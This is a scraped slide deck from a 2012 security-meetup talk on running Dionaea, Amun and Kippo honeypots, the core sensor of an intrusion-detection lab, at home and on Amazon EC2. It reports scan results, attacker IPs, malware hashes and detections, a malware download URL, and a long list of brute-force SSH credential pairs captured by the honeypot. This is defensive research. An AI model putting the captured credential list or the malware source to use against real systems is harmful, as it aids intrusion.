ONOS SDN Controller - Clustering Tests & Experiments
 
5. hands on - building local development environment with Open Mano
5. hands on - building local development environment with Open Mano5. hands on - building local development environment with Open Mano
5. hands on - building local development environment with Open Mano
 
Docker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan DriversDocker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan Drivers
 
Linux networking
Linux networkingLinux networking
Linux networking
 
9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_training9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_training
 
6. hands on - open mano demonstration in remote pool of servers
6. hands on - open mano demonstration in remote pool of servers6. hands on - open mano demonstration in remote pool of servers
6. hands on - open mano demonstration in remote pool of servers
 
SAS (Secure Active Switch)
SAS (Secure Active Switch)SAS (Secure Active Switch)
SAS (Secure Active Switch)
 
ONOS SDN Controller - Introduction
ONOS SDN Controller - IntroductionONOS SDN Controller - Introduction
ONOS SDN Controller - Introduction
 
Common Ports
Common PortsCommon Ports
Common Ports
 
Install ovs on local pc
Install ovs on local pcInstall ovs on local pc
Install ovs on local pc
 
Keeping your rack cool
Keeping your rack cool Keeping your rack cool
Keeping your rack cool
 
Kubernetes networking-made-easy-with-open-v switch
Kubernetes networking-made-easy-with-open-v switchKubernetes networking-made-easy-with-open-v switch
Kubernetes networking-made-easy-with-open-v switch
 

Andere mochten auch

Honeypot-A Brief Overview
Honeypot-A Brief OverviewHoneypot-A Brief Overview
Honeypot-A Brief Overview
SILPI ROSAN
 
Takaful insurance (world bank)
Takaful insurance (world bank)Takaful insurance (world bank)
Takaful insurance (world bank)
Haythem Dridi
 
HoneyPot for Network Security - building and testing against exploits.
HoneyPot for Network Security - building and testing against exploits.HoneyPot for Network Security - building and testing against exploits.
HoneyPot for Network Security - building and testing against exploits.
Shantanu Kumar Das
 
Intrusion detection and prevention system for network using Honey pots and Ho...
Intrusion detection and prevention system for network using Honey pots and Ho...Intrusion detection and prevention system for network using Honey pots and Ho...
Intrusion detection and prevention system for network using Honey pots and Ho...
Eng. Mohammed Ahmed Siddiqui
 

Andere mochten auch (20)

Honeypots.ppt1800363876
Honeypots.ppt1800363876Honeypots.ppt1800363876
Honeypots.ppt1800363876
 
Honeypots (Ravindra Singh Rathore)
Honeypots (Ravindra Singh Rathore)Honeypots (Ravindra Singh Rathore)
Honeypots (Ravindra Singh Rathore)
 
Virtual honeypot
Virtual honeypotVirtual honeypot
Virtual honeypot
 
Honeypot
HoneypotHoneypot
Honeypot
 
Honeypot-A Brief Overview
Honeypot-A Brief OverviewHoneypot-A Brief Overview
Honeypot-A Brief Overview
 
Honeypots and honeynets
Honeypots and honeynetsHoneypots and honeynets
Honeypots and honeynets
 
Honeypot 101 (slide share)
Honeypot 101 (slide share)Honeypot 101 (slide share)
Honeypot 101 (slide share)
 
Takaful insurance (world bank)
Takaful insurance (world bank)Takaful insurance (world bank)
Takaful insurance (world bank)
 
Honey Potz - BSides SLC 2015
Honey Potz - BSides SLC 2015Honey Potz - BSides SLC 2015
Honey Potz - BSides SLC 2015
 
Comment détecter des virus inconnus en utilisant des « honey pots » et d’autr...
Comment détecter des virus inconnus en utilisant des « honey pots » et d’autr...Comment détecter des virus inconnus en utilisant des « honey pots » et d’autr...
Comment détecter des virus inconnus en utilisant des « honey pots » et d’autr...
 
Honeypots
HoneypotsHoneypots
Honeypots
 
Computing (cloude & grid) & honey pots
Computing (cloude & grid) & honey potsComputing (cloude & grid) & honey pots
Computing (cloude & grid) & honey pots
 
IDS+Honeypots Making Security Simple
IDS+Honeypots Making Security SimpleIDS+Honeypots Making Security Simple
IDS+Honeypots Making Security Simple
 
Honey pot in cloud computing
Honey pot in cloud computingHoney pot in cloud computing
Honey pot in cloud computing
 
Client Side Honeypots
Client Side HoneypotsClient Side Honeypots
Client Side Honeypots
 
Honeypots
HoneypotsHoneypots
Honeypots
 
Honeypot ss
Honeypot ssHoneypot ss
Honeypot ss
 
HoneyPot for Network Security - building and testing against exploits.
HoneyPot for Network Security - building and testing against exploits.HoneyPot for Network Security - building and testing against exploits.
HoneyPot for Network Security - building and testing against exploits.
 
Intrusion detection and prevention system for network using Honey pots and Ho...
Intrusion detection and prevention system for network using Honey pots and Ho...Intrusion detection and prevention system for network using Honey pots and Ho...
Intrusion detection and prevention system for network using Honey pots and Ho...
 
Honeypots
HoneypotsHoneypots
Honeypots
 

Ähnlich wie Honeypots - November 8th Misec presentation

IPv6 Fundamentals & Securities
IPv6 Fundamentals & SecuritiesIPv6 Fundamentals & Securities
IPv6 Fundamentals & Securities
Don Anto
 
How to dominate a country
How to dominate a countryHow to dominate a country
How to dominate a country
Tiago Henriques
 

Ähnlich wie Honeypots - November 8th Misec presentation (20)

Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
 
Handy Networking Tools and How to Use Them
Handy Networking Tools and How to Use ThemHandy Networking Tools and How to Use Them
Handy Networking Tools and How to Use Them
 
lightning talk proposal
lightning talk proposallightning talk proposal
lightning talk proposal
 
IPv6 Fundamentals & Securities
IPv6 Fundamentals & SecuritiesIPv6 Fundamentals & Securities
IPv6 Fundamentals & Securities
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
Preso fcul
Preso fculPreso fcul
Preso fcul
 
DDoS: practical survival
DDoS: practical survivalDDoS: practical survival
DDoS: practical survival
 
(NET404) Making Every Packet Count
(NET404) Making Every Packet Count(NET404) Making Every Packet Count
(NET404) Making Every Packet Count
 
FPC for the Masses - CoRIIN 2018
FPC for the Masses - CoRIIN 2018FPC for the Masses - CoRIIN 2018
FPC for the Masses - CoRIIN 2018
 
IPv6 Security - Hacker Halted 2013
IPv6 Security - Hacker Halted 2013IPv6 Security - Hacker Halted 2013
IPv6 Security - Hacker Halted 2013
 
AWS re:Invent 2016: Making Every Packet Count (NET404)
AWS re:Invent 2016: Making Every Packet Count (NET404)AWS re:Invent 2016: Making Every Packet Count (NET404)
AWS re:Invent 2016: Making Every Packet Count (NET404)
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
 
Analysis of Compromised Linux Server
Analysis of Compromised Linux ServerAnalysis of Compromised Linux Server
Analysis of Compromised Linux Server
 
Enei
EneiEnei
Enei
 
How to dominate a country
How to dominate a countryHow to dominate a country
How to dominate a country
 
DDoS: Practical Survival Guide
DDoS: Practical Survival GuideDDoS: Practical Survival Guide
DDoS: Practical Survival Guide
 
Docker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in PragueDocker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in Prague
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
Debugging linux issues with eBPF
Debugging linux issues with eBPFDebugging linux issues with eBPF
Debugging linux issues with eBPF
 
RAZORPOINT TCP/UDP PORTS LIST
RAZORPOINT TCP/UDP PORTS LISTRAZORPOINT TCP/UDP PORTS LIST
RAZORPOINT TCP/UDP PORTS LIST
 

Honeypots - November 8th Misec presentation

  • 2. Agenda • About me • What is a honeypot? • Different kinds of honeypots • Honeypots I used • Different data I discovered
  • 3. About me • Husband • Father • Geek • Gets distracted by shiny objects easy • Breaker/Fixer of things
  • 4. This is not a honeypot.
  • 5. • Lance Spitzner’s definition of honeypots is as follows... • A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource. (May 2003)
  • 6.
  • 7. Open source • Argos • HIHAT (High Interaction Honeypot Analysis Toolkit) • Capture-HPC • Honeywall • Sebek (kernel module) • Qebek Commercial • Windows XP SP0 • Windows Vista SP0
  • 9. Open source • nepenthes • Kojoney • dionaea • Amun • Glastopf • SAFER Honeypot • Google Hack Honeypot (Spoofing Active • HoneyC Fingerprints w/ • Honeyd Enhanced Replies) • Thug Commercial • Specter • KFSensor • Honeypoint
  • 10. • Clean-net • Wife and son’s laptops • Dirty-net • My desktop • ?? • Honeybook
  • 11.
  • 12. • Medium interaction • Kippo • Low interaction • Amun • Glastopf •Dionaea • Local • “To the cloud”
  • 13. Port Amun Nepenthes Dionaea 21 ftpd ftp 25 imail 42 wins wins 69 tftp 80 http asn1 http 105 mercury 110 axigen, slmail, mdaemon 135 dcom dcom epmap 139 smb, ms06040, netdde netbiosname, netdde 143 lotusdomino
  • 14. Port Amun Nepenthes Dionaea 443 iis iis https lsass, pnp, dnsv2, asn1, asn1, dcom, lsass, 445 ms06070, ms08067, smb ms08067, pnp smb 554 helix 587 imail 617 arkeia 1023 sasserftpd sasserftpd 1025 msdtc dcom, msdtc 1080 mydoom 1111 tivoli 1433 mssql
  • 15. Port Amun Nepenthes Dionaea 1434 mssql 1581 tivoli 1900 arc 2101 msmq 2103 msmq msmq 2105 msmq msmq 2107 msmq msmq 2380 goodtech 2555 upnp 2745 bagle bagle
  • 16. Port Amun Nepenthes Dionaea 2954 hpopenview 2967 symantec symantec 2968 symantec symantec 3127 mydoom mydoom 3128 mydoom 3140 optix 3268 trend 3306 mysql 3372 msdtc msdtc 3628 trend
  • 17. Port Amun Nepenthes Dionaea 5000 upnp upnp 5060 sip 5168 trend 5554 sasserftpd sasserftpd 6070 arc 6101 veritas 6129 dameware dameware 7144 peercast 8080 tivoli 9999 maxdb
  • 18. • A low-interaction honeypot • Emulates a wide range of different vulnerabilities. • Payload transmitted by the attacker is analyzed • Any download URL found is extracted. • Next, the honeypot tries to download the malicious software and store it on the local hard disc, for further analyses.
  • 19. • A web application honeypot • Web server written in Python • Popular attack type emulation already in place • Remote file inclusion • Local file inclusion • HTML injection via POST requests • SQL injection emulation
  • 20. • Medium interaction SSH honeypot • Designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker. • Has a fake file system you can read/write to. • You can add additional commands
  • 21.
  • 22. • “To catch bugs” • meant to be a nepenthes successor • Python embedded • can detect shellcodes • supports ipv6 and tls. • A VoIP module has been developed as part of GSoc 2011
  • 23. # Nmap 6.01 scan initiated Wed Jul 25 21:46:59 2012 as: nmap -A -oN /root/Desktop/dionaea_off.txt 192.168.1.197 Nmap scan report for lp (192.168.1.197) Host is up (0.00075s latency). All 1000 scanned ports on lp (192.168.1.197) are closed MAC Address: 08:00:27:7C:3B:55 (Cadmus Computer Systems) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.75 ms lp (192.168.1.197) OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . # Nmap done at Wed Jul 25 21:47:01 2012 -- 1 IP address (1 host up) scanned in 2.28 seconds
  • 24. # Nmap 6.01 scan initiated Wed Jul 25 21:47:16 2012 as: nmap -A -oN /root/Desktop/dionaea_on.txt 192.168.1.197 Nmap scan report for lp (192.168.1.197)Host is up (0.00087s latency). Not shown: 990 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Dionaea honeypot ftpd |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 42/tcp open tcpwrapped 80/tcp open http? |_http-title: Directory listing for / 135/tcp open msrpc? 443/tcp open ssl/https?|_http-title: Directory listing for / | ssl-cert: Subject: commonName=Nepenthes Development Team/organizationName=dionaea.carnivore.it/countryName=DE | Not valid before: 2012-07-26 01:47:37 |_Not valid after: 2013-07-26 01:47:37445/tcp open microsoft-ds Dionaea honeypot smbd 1433/tcp open ms-sql-s Dionaea honeypot MS-SQL server 3306/tcp open mysql MySQL 5.0.54| mysql-info: Protocol: 10 | Version: 5.0.54 | Thread ID: 1729232896 | Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection | Status: Autocommit|_Salt: aaaaaaaa 5060/tcp open sip (SIP end point; Status: 200 OK)5061/tcp open ssl/sip (SIP end point; Status: 200 OK) | ssl-cert: Subject: commonName=Nepenthes Development Team/organizationName=dionaea.carnivore.it/countryName=DE| Not valid before: 2012-07-26 01:47:37|_Not valid after: 2013-07-26 01:47:374 services unrecognized despite returning data. MAC Address: 08:00:27:7C:3B:55 (Cadmus Computer Systems)Device type: general purposeRunning: Linux 2.6.X|3.XOS CPE: cpe:/o:linux:kernel:2.6 cpe:/o:linux:kernel:3OS details: Linux 2.6.38 - 3.2Network Distance: 1 hopHost script results:|_nbstat: NetBIOS name: LP, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>|_smbv2-enabled: Server doesn't support SMBv2 protocol| smb-security-mode: | Account that was used for smb scripts: guest| User-level authentication| SMB Security: Challenge/response passwords supported|_ Message signing disabled (dangerous, but default)| smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager)| NetBIOS computer name: HOMEUSER-
  • 25. • 14 pcap files, total of 102 Meg • 129 “replay” files – 4 Meg • 2 log files • Error log • Activity log • 2 SQLite database files • Logsqlite – Activity log but in SQLite format • Sipaccounts • 1 malicious executable
  • 26. Day 1 • 44 Unique IP addresses • Time it took to get connections – 14 minutes Day 2 • xx Unique IP addresses • Time it took to get connections - • Malicious file uploaded • Never live with the results of one tool, always use multiple tools!!
  • 27. TCP Port Occurrences Protocol Occurrence 23 46 Telnet IP address s 22 42 SSH 184.171.169.60 69 80 40 HTTP 74.63.195.90 19 1080 38 SOCKS Proxy 184.164.150.13 9 135 34 DCE Endpoint 64.31.14.106 5 73 26 NETRJS 101.78.154.123 4 808 20 Net.TCP Port Sharing 118.122.188.96 3 25 15 SMTP 12.134.192.58 3 993 14 IMAPS 175.16.97.164 3 110 11 POP3 178.95.22.152 3 139 9 NetBIOS 184.52.56.26 3 1 8 TCPMUX 199.188.104.83 3 21 6 FTP 211.147.3.19 3 79 6 Finger 221.2.209.46 3 143 5 IMAP 64.31.29.62 3 587 5 SMTP (Email message submission) 71.99.147.51 3 995 5 POP3 over TLS/SSL 117.27.137.48 2 1096 5 ?? 120.151.204.106 2 43 4 WHOIS 121.52.71.115 2 81 4 Torpack – Onion routing 14.102.115.51 2 199.19.94.85 2
  • 31. Occurrence OS s Link Occurrences Linux 14 ethernet/modem 54 Windows 30 IPv6/IPIP 3 Solaris 1 pppoe (DSL) 15 sometimes DSL (3) 4 OS version - Windows OS version - Linux XP/2000 (RFC1323+, w+, tstamp-) 2 2.6 (newer, 1) 1 XP SP1+, 2000 SP3 3 2.6 (newer, 2) 2 2000 SP4, XP SP1+ 22 2.6 (newer, 3) 4 2.6, seldom 2.4 (older, 2000 SP2+, XP SP1+ (seldom 98) 3 2) 5 2.6, seldom 2.4 (older, 4) 2
  • 32. Day 1 Goals • Get the honeypot installed and up and running • Get some traffic • Run some packet captures Timeline 1. 2:55 pm 1. Started dionaea 2. I immediately run an nmap scan and it just lit up like a Christmas tree. 3. That accounts for 1053 connection attempts. 4. 6:44pm - Started wireshark packet capture 2. 3:07 - the first “attacker” appears (me) 1. 6:58 - the first connection appears
  • 33. Day 2 Goals • Start saving packet captures (with “no arp” on the capture filter) • Get some traffic • Catch some malware? Timeline 1. 11:12:04am 1. Get a connection from 69.57.27.138 2. Attempts connection to TCP port 135 (epmap). It gets a SYN, ACK. 2. 11:12:06 am 1. Tftp session is initiated and malware is being dropped on system 3. 11:12:42 am 1. Tftp session completes 4. 14:39:47 am 1. He’s back! (Process from 1.1 starts all over again)
  • 34. MD5 - aff643a5014a9d8e98b24fa4dac11623 • Virus Total – 40/42 detection ratio • Rbot • ThreatExpert •A malicious backdoor trojan that runs in the background and allows remote access to the compromised system • A network-aware worm that attempts to replicate across the existing network(s)
  • 35. IP Address and Domain Information – Chrome extension (from TCPIPUtils. OrgName Algona Municipal Utilities OrgId AMU-6 Address 104 West Call Street Address PO Box 10 City Algona StateProv IA PostalCode 50511 Country US RegDate 1/20/2011 Updated 7/6/2011 http://www.netamu.com/
  • 36.
  • 38.
  • 39. Round 2 Amazon EC2 Ubuntu 12.04 Microinstance • Virginia • Oregon • San Paolo, South America • Ireland • Toyko (Thanks Sukotto_san!) Unable to do • Singapore
  • 40. • Virginia • 3 files • Oregon • 0 files • South America • 1 file • Toyko • 1 file • Ireland • 40 files!!
  • 41. • Virginia • 7a5acd7da5a5d7845a4bcd1a90019e69 • VirusTotal – 40/44 • W32/Conficker.worm.gen.a - Mcafee • 607a710f446de466fcb3be1e5c189c71 • VirusTotal – 42/44 • VirScan.org – File name - azsvf.nmg • 344770974dce3c039b48d27bd4e9a114 • VirusTotal – 41/42 • W32/Conficker.worm – Mcafee • ThreatExpert link - http://www.threatexpert.com/report. aspx?md5=344770974dce3c039b48d27bd4 e9a114
  • 42. Occurrence IP Address Occurrences TCP Port s Protocol 175.23.26.55 11 61.147.103.85 7 1443 20 MSSQL Server 211.22.54.147 3 Microsoft-DS Active 42.121.84.187 2 Directory, Windows 31.13.232.59 2 445 6 shares 182.1.23.144 2 NetBIOS NetBIOS 173.163.222.22 1 139 2 Session Service 211.22.54.145 1 Microsoft Terminal 3389 1 Server (RDP)
  • 47.
  • 50.
  • 52. • South America • 1 file • 0139abdd353ca804aa654c8db556dc46 • VirusTotal – 32/41 • Kaspersky - Trojan.Win32.Jorik.IRCbot.qrq
  • 54. • Toyko • 2 files • 933be7b1b0077563f639a99d131bde7f • From: http://esendfile.com/xx81.exe • File name: xx81.exe • Analysis date: 2012-11-02 23:08:50 UTC • VirusTotal – 33/44 • Kaspersky - Trojan- Dropper.Win32.Injector.fyym • Microsoft - VirTool:Win32/CeeInject.gen!IJ • Sophos - Troj/ProcInj-N • csrss.exe • From: smb://87.241.82.99 • (Didn’t save)
  • 56. TCP Port Occurances Protocol 3306 909 MySQL database system 176 81 ?? 1433 49 MSSQL Server 34354 38 ?? 3389 34 Microsoft Terminal Server (RDP) 80 31 Hypertext Transfer Protocol (HTTP) 110 18 Post Office Protocol v3 (POP3) 445 18 Microsoft-DS Active Directory, Windows shares 25 13 Simple Mail Transfer Protocol (SMTP) 139 11 NetBIOS NetBIOS Session Service 23 9 Telnet protocol Microsoft EPMAP (End Point Mapper), also known 135 6 as DCE/RPC Locator service,[14] used to remotely manage services including DHCP server, DNSserver and WINS. Also used by DCOM
  • 57. IP address Occurrences 66.225.253.122 273 119.1.96.68 192 58.211.69.182 179 61.160.200.46 99 210.195.52.9 81 183.136.144.36 78 202.165.179.118 38 37.46.112.145 31 58.16.63.214 30 201.116.201.248 28 121.245.220.214 24 165.225.128.229 18
  • 60. • Ireland • 40 files • VirusTotal results • Kaspersky • Microsoft • Sophos • This was from a time frame spanning between
  • 61. Detection File name (MD5) ratio: Analysis date: Kaspersky Microsoft Sophos 8aefa2d9f0a6cf4d70ecc484 2011-06-25 22:20:53 a953c007 37 / 42 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A 7c3c59692a7d4c4f53187a4 2011-09-13 20:56:07 284bc53df 40 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A 6dd2d5993d634aeab90682 2011-12-07 07:00:30 ad2e59376f 38 / 43 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A deaf1f22c26f974a7977ba56 2012-08-05 02:50:41 78e159a9 36 / 41 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.C Mal/Conficker-A 4d2694b90c3fb8e6f9116c2 2012-08-28 05:32:10 0e8cbfa91 38 / 41 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A 9abd8f29a3d24c1c6c32260 2012-09-22 16:47:01 e8493ac43 29 / 31 UTC Backdoor.Win32.Rbot.bqj n/a n/a 0c059b0d1d5a03f69a21185 2012-11-05 05:32:43 987c17d5c 42 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.C Mal/Conficker-A 0d8478eec0a3d9632e7d7c 2012-11-05 05:32:52 d432f7ee09 41 / 44 UTC Backdoor.Win32.Rbot.bqj Backdoor:Win32/Rbot W32/Rbot-Gen 16ebc1c90231a9e78ed1ed 2012-11-05 05:33:29 e0a58e58cb 18 / 21 UTC n/a n/a Mal/Conficker-A 2aeae56802c4efc7b68e8e1 2012-11-05 05:35:09 f6b04edea 41 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A
  • 62. Detection File name (MD5) ratio: Analysis date: Kaspersky Microsoft Sophos 2e8da5a55865a091864a4338ef4d Worm:Win32/Conficker.C Mal/Conficker- 2e44 42 / 44 2012-11-05 05:35:26 UTC Net-Worm.Win32.Kido.ih A 344770974dce3c039b48d27bd4e9 Mal/Conficker- a114 42 / 44 2012-11-05 05:35:49 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A 3d17d15d86c34874039e77341aab Mal/Conficker- b1c4 41 / 44 2012-11-05 05:36:33 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A 3f46687b1f8d403b901e46a37045 Mal/Conficker- 08ea 42 / 44 2012-11-05 05:36:46 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A 4934ddd5bdfa5635f946667d66c83 Trojan.Win32.Genome.m Mal/Conficker- 4b6 41 / 43 2012-11-05 05:37:25 UTC voq Worm:Win32/Conficker.B A 4fbcfb9557656c96edb479e30eef2f Mal/Conficker- b3 43 / 44 2012-11-05 05:38:02 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A 574cf0062911c8c4eca2156187b8 Mal/Conficker- 207d 42 / 44 2012-11-05 05:38:35 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A 58a4a4bbba4d75dbc6c6c7c9b439 Mal/Conficker- 955d 39 / 43 2012-11-05 05:38:39 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A 59fe65fad4849c95ed538475c1f70 Trojan.Win32.Genome.wj Mal/Conficker- 7cf 42 / 44 2012-11-05 05:38:51 UTC uk Worm:Win32/Conficker.C A 5cd426dbec0619b9500a96f24b38 Mal/Conficker- 86c8 41 / 44 2012-11-05 05:39:05 UTC Net-Worm.Win32.Kido.ks Worm:Win32/Conficker.B A 6ce65eea05ae7fc659a455b5e158 Mal/Conficker- 9ab0 40 / 43 2012-11-05 05:40:44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A
  • 63. Detection File name (MD5) ratio: Analysis date: Kaspersky Microsoft Sophos 78c9042bbcefd65beaa0d40386da 2012-11-05 05:41:28 9f89 39 / 40 UTC n/a Worm:Win32/Conficker.C Mal/Conficker-A 7bb455ea4a77b24478fba4de145 2012-11-05 05:41:45 115eb 40 / 43 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A 94e689d7d6bc7c769d09a590667 2012-11-05 05:43:42 27497 42 / 43 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A 961cfb405f6aa100bf6a3d66507ed 2012-11-05 05:43:54 a18 41 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A 9c09418c738e265a27e6c599f43d 2012-11-05 05:44:19 86ab 43 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A a312c8b1adb48a60b0f755a5711b 2012-11-05 05:44:57 Trojan.Win32.Genome.h 8995 43 / 44 UTC kck Worm:Win32/Conficker.C Mal/Conficker-A acf4da36e762084070f8138a4314 2012-11-05 05:45:49 4759 43 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A b081022fc581decf4c8640dbc74a 2012-11-05 05:46:09 9198 42 / 43 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A bc9d30d59788c70060d7eabd6ab 2012-11-05 05:46:57 5e663 41 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A bdc18dfcfa63861aaa9d9fb95919d 2012-11-05 05:47:01 32a 42 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A
  • 64. Detection File name (MD5) ratio: Analysis date: Kaspersky Microsoft Sophos c7277972654775258bf3d4d6936eb 2012-11-05 05:48:00 Worm:Win32/Conficker Mal/Conficker- 1b0 41 / 44 UTC Net-Worm.Win32.Kido.ih .B A cae4b7963f5e43033664299a4d5bd 2012-11-05 05:48:11 Worm:Win32/Conficker Mal/Conficker- 176 43 / 44 UTC Net-Worm.Win32.Kido.ih .B A d45895e3980c96b077cb4ed8dc163 2012-11-05 05:48:48 Worm:Win32/Conficker Mal/Conficker- db8 43 / 44 UTC Trojan.Win32.Genome.taql .C A d90b4a84515f3a4d7d4ca716d9263 2012-11-05 05:49:11 Worm:Win32/Conficker Mal/Conficker- a5e 42 / 44 UTC Net-Worm.Win32.Kido.ih .B A e1855fbe6cf64738bffb9dc195e38ed 2012-11-05 05:49:46 Worm:Win32/Conficker Mal/Conficker- 1 41 / 44 UTC Net-Worm.Win32.Kido.ih .B A e53ed987e82ad7bf076c23d91401c 2012-11-05 05:50:05 Worm:Win32/Conficker Mal/Conficker- ac7 42 / 44 UTC Net-Worm.Win32.Kido.ih .B A ef87b673c8e3b77bdf2342e42e1b5f 2012-11-05 05:50:49 Net- Worm:Win32/Conficker Mal/Conficker- 0c 43 / 44 UTC Worm.Win32.Kido.dam.ba .C A fb34cb2d017899592aa1c8d578bfa4 2012-11-05 05:51:36 Worm:Win32/Conficker Mal/Conficker- 55 41 / 44 UTC Net-Worm.Win32.Kido.ih .B A d41d8cd98f00b204e9800998ecf842 2012-11-05 16:11:31 7e 0 / 42 UTC - - -
  • 65.
  • 66. TCP Port Occurrences Protocol 3306 205 MySQL database system 1433 173 MSSQL Server 445 154 Microsoft-DS Active Directory, Windows shares 5060 45 Session Initiation Protocol (SIP) 139 38 NetBIOS NetBIOS Session Service 80 32 Hypertext Transfer Protocol (HTTP) 3389 13 Microsoft Terminal Server (RDP) 1080 11 SOCKS proxy 135 6 DCE endpoint resolution 9097 5 ?? 23 3 Telnet protocol 110 3 Post Office Protocol v3 (POP3)
  • 67. IP address Occurrences GeoIP location Interesting notes TCPIPUtils.com – 1 of 4 spam databases 48 different websites near this IP 61.147.103.137 147 Beijing, Beijing, China (CN) Gaza, Palestinian Territory 188.161.92.153 44 (PS) TCPIPUtils.com – 1 of 4 spam databases 42.121.19.84 27 Hangzhou, Zhejiang, China (CN) TCPIPUtils.com – 1 of 4 spam databases 203.162.35.88 23 Vietnam (VN) 125.65.108.65 16 Chengdu, Sichuan, China (CN) 68 different websites near this IP Buenos Aires, Distrito 181.0.218.144 16 Federal, Argentina (AR) 26 different websites near this IP 65.18.174.167 16 Near Wichita, KS including datemarriedwomen.org Same website where malware from 111.249.26.205 14 Taipei, T'ai-pei, Taiwan (TW) Virginia came from. 211.154.213.122 12 Beijing, Beijing, China (CN) TCPIPUtils.com – 1 of 4 spam databases 42.120.0.238 12 Hangzhou, Zhejiang, China (CN) São Paulo, Sao Paulo, Brazil TCPIPUtils.com – 1 of 4 spam databases 187.35.61.105 10 (BR) 17 different websites near this IP 210.211.117.81 10 Vietnam (VN)
  • 68.
  • 69.
  • 70.
  • 71. t1na/t1na pass/pass oscar/oscar luciana/luciana t1na/tina f/f bot/bot volume/volume alexis/alexis roberto/roberto ba/ba boootz/boootz logic/logic haiduc/haiduc telegest/telegest display/display art/art rapper/rapper mwyatt/mwyatt red/red a/a vova/vova j/j wolf/wolf diablo/diablo medina/medina luci/luci m/m desiree/desiree password/password silvia/silvia vcsa/vcsa b/b g/g apocalipsa/apocalipsa dummy/dummy b1ablo/d1ablo kim/kim simbol/simbol maria/maria slim/slim ionita/ionita boot/boot ion/ion abel/abel raper/raper best/best sah/sah c/c vava/vava ha/ha powered/powered paradise/paradise passwd/passwd k/k bombastik/bombastik eminem/eminem nicoara/nicoara postgres/postgres good/good doris/doris h/h lucian/lucian pink/pink shortcut/shortcut goncalo/goncalo apocalipse/apocalipse n/n d/d space/space ioana/ioana visa/visa paradisse/paradisse jurca/jurca skin/skin gianluca/gianluca shaggy/shaggy st/st addicted/addicted atb/atb damian/damian baba/baba bots/bots bus/bus adm/adm change/change thebest/thebest melania/melania e/e slayer/slayer l/l power/power baggio/baggio i/i gdm/gdm dudu/dudu haitac/haitac lucia/lucia box/box bela/bela rap/rap apoi/apoi maria/maria fantastic/fantastic jean/jean sst/sst ying/yiang bad/bad
  • 72. blue/blue vh/vh putty/putty marian/marian luca/luca yahoo/yahoo ven/ven conterstrike/conterstrike claudius/claudius sly/sly cs/cs abo/abo o/o q/q s/s cretu/cretu mastercard/mastercard maryjane/maryjane tehnolog/tehnolog ness/ness buzzz/buzzz buzz/buzz leo/leo123 u/u bella/bella mago/mago herbagen/herbagen calcul/calcul mumu/mumu lammer/lammer romana/romana cimlinux/cimlinux mada/mada pasare/pasare caine/caine hacker/hacker skype/skype skywalker/skywalker shoot/shoot anton/anton sybille/sybille sims2/sims2 stat/stat germana/germana bed/bed tim/tim mandi/mandi europa/europa p/p discovery/discovery ana/ana slow/slow officeinn/officeinn hotmail/hostmail ambulator/ambulator race/race terriffic/terriffic vn/vn joc/joc portocala/portocala root/password accept/accept conter/conter mark/mark suga/suga marianne/marianne lp/lp v/v master/master xman/xman next/next cserv/cserv buz/buz r/r t/t ne/ne madalina/madalina matematica/matematica quatrida/quatrida atai/atai muie/muie bird/bird gaming/gaming creata/creata inger/inger pisica/pisica zeppelin/zeppelin casa/casa skipe/skipe 